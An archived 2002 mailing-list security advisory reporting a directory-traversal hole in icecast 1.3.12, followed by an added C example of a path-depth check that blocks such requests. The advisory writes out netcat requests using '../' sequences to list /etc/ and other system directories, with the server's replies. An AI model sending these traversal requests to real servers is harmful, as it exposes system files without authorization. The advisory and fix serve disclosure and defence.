Vulnerability Development mailing list archives

VANED LABS: icecast filesystem disclosure


From: glaive () VANED NET
Date: Tue, 9 Jul 2002 13:39:03 -0500

list_directory() makes no effort to constrain the request to the static
directory.  Icecast allows for remote probing of the underlying
filesystem structure.  (On a side note, this can also be used to list
files with a .mp3 extension anywhere on the system.  send_file() does do
traversal checking.)

% nc icecast.host 8000
GET /file/../../../../../../../../nonexistent/ HTTP/1.0

HTTP/1.0 404 Not Found
Server: icecast/1.3.12
Connection: close
Content-Type: text/html

...

% nc icecast.host 8000
GET /file/../../../../../../../../etc/ HTTP/1.0

HTTP/1.0 200 OK
Server: icecast/1.3.12
Connection: close
Content-Type: text/html

...
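
Added example, not part of the original post and not icecast's code: one way a directory-listing handler could refuse requests that climb above the static directory, by decoding the request and tracking path depth. The function names, the 1024-byte limit, and the assumption that the argument is the request path after the "/file/" prefix are all hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Decode %XX escapes in place so "%2e%2e" is seen as "..".
   Returns -1 on a malformed escape or an encoded NUL byte. */
static int url_decode(char *s)
{
    char *out = s;
    for (; *s; s++) {
        unsigned int v = (unsigned char)*s;
        if (*s == '%') {
            if (!isxdigit((unsigned char)s[1]) || !isxdigit((unsigned char)s[2]))
                return -1;
            sscanf(s + 1, "%2x", &v);
            if (v == 0)
                return -1;
            s += 2;
        }
        *out++ = (char)v;
    }
    *out = '\0';
    return 0;
}

/* Returns 1 if the request stays inside the static directory, 0 if any
   prefix of it climbs above the root (hypothetical helper). */
int request_stays_in_root(const char *request)
{
    char buf[1024];
    int depth = 0;
    if (strlen(request) >= sizeof buf)
        return 0;
    strcpy(buf, request);
    if (url_decode(buf) != 0)
        return 0;
    for (const char *p = buf; *p; ) {
        size_t n = strcspn(p, "/");          /* length of this segment */
        if (n == 2 && p[0] == '.' && p[1] == '.') {
            if (--depth < 0)
                return 0;                    /* climbed above the root */
        } else if (n > 0 && !(n == 1 && p[0] == '.')) {
            depth++;                         /* ordinary directory name */
        }
        p += n + (p[n] == '/');
    }
    return 1;
}

int main(void) { return request_stays_in_root("music/../live/") ? 0 : 1; }
```

This check is purely lexical, so a symbolic link inside the static directory can still point outside it; comparing the resolved path (for example from realpath()) against the resolved root closes that gap.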

